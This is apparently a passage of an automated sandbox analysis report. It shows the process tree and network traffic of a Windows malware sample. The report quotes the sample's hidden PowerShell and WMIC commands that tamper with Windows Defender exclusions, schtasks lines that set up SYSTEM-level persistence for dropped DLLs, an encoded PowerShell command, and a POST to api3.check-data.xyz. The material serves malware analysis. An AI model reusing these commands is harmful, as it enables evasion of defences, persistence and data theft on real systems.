                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        7⤵
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2932
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                  4⤵
                                                                                                    PID:2240
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                      5⤵
                                                                                                        PID:2916
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                          6⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Drops file in System32 directory
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2244
                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                            7⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2964
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\MaCEdJmjU\szzNjM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "dZgNXlBFHKJPYkR" /V1 /F
                                                                                                    3⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:1712
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "dZgNXlBFHKJPYkR2" /F /xml "C:\Program Files (x86)\MaCEdJmjU\rejZDPf.xml" /RU "SYSTEM"
                                                                                                    3⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:2724
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /END /TN "dZgNXlBFHKJPYkR"
                                                                                                    3⤵
                                                                                                      PID:2816
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /DELETE /F /TN "dZgNXlBFHKJPYkR"
                                                                                                      3⤵
                                                                                                        PID:2024
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "RnVvAZaQEByRQe" /F /xml "C:\Program Files (x86)\zWTlFEDWyZjU2\BkLeqNI.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2600
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "bxpvtvpljnCBk2" /F /xml "C:\ProgramData\hDwfgHvtnjxOxeVB\FFvMggw.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1964
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "dfBKvmetieHVblCDx2" /F /xml "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR\jYSNcTR.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2504
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "UKqBjuPeLLAHSylBWrg2" /F /xml "C:\Program Files (x86)\CYZcjjLrQSSSC\YlWuqsp.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1148
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "rrUPsTjgSYBWMUseO" /SC once /ST 04:42:12 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QpEhKTiRofuFzpEd\yUyAIlrQ\CRfojXT.dll\",#1 /gzLLdidVZe 525403" /V1 /F
                                                                                                        3⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1368
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /run /I /tn "rrUPsTjgSYBWMUseO"
                                                                                                        3⤵
                                                                                                          PID:892
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /DELETE /F /TN "LTdmnWMddFrWELagp"
                                                                                                          3⤵
                                                                                                            PID:1768
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 1556
                                                                                                            3⤵
                                                                                                            • Loads dropped DLL
                                                                                                            • Program crash
                                                                                                            PID:2960
                                                                                                        • C:\Windows\system32\rundll32.EXE
                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QpEhKTiRofuFzpEd\yUyAIlrQ\CRfojXT.dll",#1 /gzLLdidVZe 525403
                                                                                                          2⤵
                                                                                                            PID:1276
                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QpEhKTiRofuFzpEd\yUyAIlrQ\CRfojXT.dll",#1 /gzLLdidVZe 525403
                                                                                                              3⤵
                                                                                                              • Blocklisted process makes network request
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Loads dropped DLL
                                                                                                              • Drops file in System32 directory
                                                                                                              • Enumerates system info in registry
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:3000
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /DELETE /F /TN "rrUPsTjgSYBWMUseO"
                                                                                                                4⤵
                                                                                                                  PID:1628
                                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                                            taskeng.exe {E9DF4908-5695-4DAA-8304-5913600E82D3} S-1-5-21-3502430532-24693940-2469786940-1000:PSBQWFYT\Admin:Interactive:[1]
                                                                                                            1⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:1664
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                              2⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Drops file in System32 directory
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1144
                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                3⤵
                                                                                                                  PID:2828
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                2⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Drops file in System32 directory
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1868
                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                  3⤵
                                                                                                                    PID:1560
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                  2⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:1516
                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                    3⤵
                                                                                                                      PID:2532
                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                  1⤵
                                                                                                                    PID:2932
                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                    1⤵
                                                                                                                      PID:924
                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                      1⤵
                                                                                                                        PID:2744
                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe "-1744901112187078600011220915002101587676-1492275783612922105709375028379580899"
                                                                                                                        1⤵
                                                                                                                          PID:2660

                                                                                                                        Network

                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          service-domain.xyz
                                                                                                                          pjDElFp.exe
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          service-domain.xyz
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          service-domain.xyz
                                                                                                                          IN A
                                                                                                                          54.210.117.250
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          c.pki.goog
                                                                                                                          pjDElFp.exe
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          c.pki.goog
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          c.pki.goog
                                                                                                                          IN CNAME
                                                                                                                          pki-goog.l.google.com
                                                                                                                          pki-goog.l.google.com
                                                                                                                          IN A
                                                                                                                          216.58.201.99
                                                                                                                        • flag-gb
                                                                                                                          GET
                                                                                                                          http://c.pki.goog/r/r1.crl
                                                                                                                          pjDElFp.exe
                                                                                                                          Remote address:
                                                                                                                          216.58.201.99:80
                                                                                                                          Request
                                                                                                                          GET /r/r1.crl HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                          Host: c.pki.goog
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                                                                          Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                                                                          Content-Length: 854
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Server: sffe
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          Date: Mon, 22 Jul 2024 04:57:24 GMT
                                                                                                                          Expires: Mon, 22 Jul 2024 05:47:24 GMT
                                                                                                                          Cache-Control: public, max-age=3000
                                                                                                                          Age: 1008
                                                                                                                          Last-Modified: Wed, 01 Nov 2023 07:48:00 GMT
                                                                                                                          Content-Type: application/pkix-crl
                                                                                                                          Vary: Accept-Encoding
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          o.pki.goog
                                                                                                                          pjDElFp.exe
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          o.pki.goog
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          o.pki.goog
                                                                                                                          IN CNAME
                                                                                                                          pki-goog.l.google.com
                                                                                                                          pki-goog.l.google.com
                                                                                                                          IN A
                                                                                                                          216.58.201.99
                                                                                                                        • flag-gb
                                                                                                                          GET
                                                                                                                          http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQC1wDSQwr%2F7UxDebtw0D9JJ
                                                                                                                          pjDElFp.exe
                                                                                                                          Remote address:
                                                                                                                          216.58.201.99:80
                                                                                                                          Request
                                                                                                                          GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQC1wDSQwr%2F7UxDebtw0D9JJ HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                          Host: o.pki.goog
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Server: ocsp_responder
                                                                                                                          Content-Length: 472
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Date: Mon, 22 Jul 2024 05:00:47 GMT
                                                                                                                          Cache-Control: public, max-age=14400
                                                                                                                          Content-Type: application/ocsp-response
                                                                                                                          Age: 805
                                                                                                                        • flag-gb
                                                                                                                          GET
                                                                                                                          http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDJocJI3cuzOAqV4KAdwn94
                                                                                                                          pjDElFp.exe
                                                                                                                          Remote address:
                                                                                                                          216.58.201.99:80
                                                                                                                          Request
                                                                                                                          GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDJocJI3cuzOAqV4KAdwn94 HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                          Host: o.pki.goog
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Server: ocsp_responder
                                                                                                                          Content-Length: 472
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Date: Mon, 22 Jul 2024 04:46:38 GMT
                                                                                                                          Cache-Control: public, max-age=14400
                                                                                                                          Content-Type: application/ocsp-response
                                                                                                                          Age: 1655
                                                                                                                        • flag-gb
                                                                                                                          GET
                                                                                                                          http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEC3M0Op9qKoaCXtJy2kA5Hs%3D
                                                                                                                          pjDElFp.exe
                                                                                                                          Remote address:
                                                                                                                          216.58.201.99:80
                                                                                                                          Request
                                                                                                                          GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEC3M0Op9qKoaCXtJy2kA5Hs%3D HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                          Host: o.pki.goog
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Server: ocsp_responder
                                                                                                                          Content-Length: 471
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Date: Mon, 22 Jul 2024 04:29:43 GMT
                                                                                                                          Cache-Control: public, max-age=14400
                                                                                                                          Content-Type: application/ocsp-response
                                                                                                                          Age: 2670
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          clients2.google.com
                                                                                                                          pjDElFp.exe
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          clients2.google.com
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          clients2.google.com
                                                                                                                          IN CNAME
                                                                                                                          clients.l.google.com
                                                                                                                          clients.l.google.com
                                                                                                                          IN A
                                                                                                                          142.250.200.14
                                                                                                                        • flag-gb
                                                                                                                          GET
                                                                                                                          https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&yeabpvIfiW
                                                                                                                          pjDElFp.exe
                                                                                                                          Remote address:
                                                                                                                          142.250.200.14:443
                                                                                                                          Request
                                                                                                                          GET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&yeabpvIfiW HTTP/1.1
                                                                                                                          Host: clients2.google.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Response
                                                                                                                          HTTP/1.1 302 Moved Temporarily
                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-zTP6_TZBpkOMdGLcgMZhFQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                          Date: Mon, 22 Jul 2024 05:14:13 GMT
                                                                                                                          Location: https://clients2.googleusercontent.com/crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          Server: GSE
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          clients2.googleusercontent.com
                                                                                                                          pjDElFp.exe
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          clients2.googleusercontent.com
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          clients2.googleusercontent.com
                                                                                                                          IN CNAME
                                                                                                                          googlehosted.l.googleusercontent.com
                                                                                                                          googlehosted.l.googleusercontent.com
                                                                                                                          IN A
                                                                                                                          142.250.178.1
                                                                                                                        • flag-gb
                                                                                                                          GET
                                                                                                                          https://clients2.googleusercontent.com/crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                                          pjDElFp.exe
                                                                                                                          Remote address:
                                                                                                                          142.250.178.1:443
                                                                                                                          Request
                                                                                                                          GET /crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Host: clients2.googleusercontent.com
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 26186
                                                                                                                          X-GUploader-UploadID: ACJd0NrJWlaJHCLrTWyAK0PIM9bJCLOW3VC-TcgXOU3hvoXLWTvXnlr2i8oBG8EFht2tYGoOseI
                                                                                                                          X-Goog-Hash: crc32c=i5zIOg==
                                                                                                                          Server: UploadServer
                                                                                                                          Date: Sun, 21 Jul 2024 06:44:05 GMT
                                                                                                                          Expires: Mon, 21 Jul 2025 06:44:05 GMT
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Age: 81008
                                                                                                                          Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT
                                                                                                                          ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100
                                                                                                                          Content-Type: application/x-chrome-extension
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          api3.check-data.xyz
                                                                                                                          rundll32.exe
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          api3.check-data.xyz
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          api3.check-data.xyz
                                                                                                                          IN CNAME
                                                                                                                          checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                          checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                          IN A
                                                                                                                          44.240.96.128
                                                                                                                          checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                          IN A
                                                                                                                          44.237.52.63
                                                                                                                        • flag-us
                                                                                                                          POST
                                                                                                                          http://api3.check-data.xyz/api2/google_api_ifi
                                                                                                                          rundll32.exe
                                                                                                                          Remote address:
                                                                                                                          44.240.96.128:80
                                                                                                                          Request
                                                                                                                          POST /api2/google_api_ifi HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36
                                                                                                                          Host: api3.check-data.xyz
                                                                                                                          Content-Length: 723
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Cache-control: no-cache="set-cookie"
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Date: Mon, 22 Jul 2024 05:12:02 GMT
                                                                                                                          Server: nginx
                                                                                                                          Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: keep-alive
                                                                                                                        • 54.210.117.250:443
                                                                                                                          service-domain.xyz
                                                                                                                          tls
                                                                                                                          pjDElFp.exe
                                                                                                                          399 B
                                                                                                                          219 B
                                                                                                                          5
                                                                                                                          5
                                                                                                                        • 54.210.117.250:443
                                                                                                                          service-domain.xyz
                                                                                                                          tls
                                                                                                                          pjDElFp.exe
                                                                                                                          361 B
                                                                                                                          219 B
                                                                                                                          5
                                                                                                                          5
                                                                                                                        • 54.210.117.250:443
                                                                                                                          service-domain.xyz
                                                                                                                          tls
                                                                                                                          pjDElFp.exe
                                                                                                                          288 B
                                                                                                                          219 B
                                                                                                                          5
                                                                                                                          5
                                                                                                                        • 54.210.117.250:443
                                                                                                                          service-domain.xyz
                                                                                                                          pjDElFp.exe
                                                                                                                          190 B
                                                                                                                          92 B
                                                                                                                          4
                                                                                                                          2
                                                                                                                        • 216.58.201.99:80
                                                                                                                          http://c.pki.goog/r/r1.crl
                                                                                                                          http
                                                                                                                          pjDElFp.exe
                                                                                                                          400 B
                                                                                                                          1.7kB
                                                                                                                          6
                                                                                                                          4

                                                                                                                          HTTP Request

                                                                                                                          GET http://c.pki.goog/r/r1.crl

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 216.58.201.99:80
                                                                                                                          http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEC3M0Op9qKoaCXtJy2kA5Hs%3D
                                                                                                                          http
                                                                                                                          pjDElFp.exe
                                                                                                                          1.0kB
                                                                                                                          2.3kB
                                                                                                                          7
                                                                                                                          5

                                                                                                                          HTTP Request

                                                                                                                          GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQC1wDSQwr%2F7UxDebtw0D9JJ

                                                                                                                          HTTP Response

                                                                                                                          200

                                                                                                                          HTTP Request

                                                                                                                          GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDJocJI3cuzOAqV4KAdwn94

                                                                                                                          HTTP Response

                                                                                                                          200

                                                                                                                          HTTP Request

                                                                                                                          GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEC3M0Op9qKoaCXtJy2kA5Hs%3D

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 142.250.200.14:443
                                                                                                                          https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&yeabpvIfiW
                                                                                                                          tls, http
                                                                                                                          pjDElFp.exe
                                                                                                                          1.1kB
                                                                                                                          8.6kB
                                                                                                                          10
                                                                                                                          13

                                                                                                                          HTTP Request

                                                                                                                          GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&yeabpvIfiW

                                                                                                                          HTTP Response

                                                                                                                          302
                                                                                                                        • 142.250.178.1:443
                                                                                                                          https://clients2.googleusercontent.com/crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                                          tls, http
                                                                                                                          pjDElFp.exe
                                                                                                                          1.6kB
                                                                                                                          37.8kB
                                                                                                                          20
                                                                                                                          31

                                                                                                                          HTTP Request

                                                                                                                          GET https://clients2.googleusercontent.com/crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 44.240.96.128:80
                                                                                                                          http://api3.check-data.xyz/api2/google_api_ifi
                                                                                                                          http
                                                                                                                          rundll32.exe
                                                                                                                          1.2kB
                                                                                                                          536 B
                                                                                                                          4
                                                                                                                          3

                                                                                                                          HTTP Request

                                                                                                                          POST http://api3.check-data.xyz/api2/google_api_ifi

                                                                                                                          HTTP Response

                                                                                                                          200
                                                                                                                        • 8.8.8.8:53
                                                                                                                          service-domain.xyz
                                                                                                                          dns
                                                                                                                          pjDElFp.exe
                                                                                                                          64 B
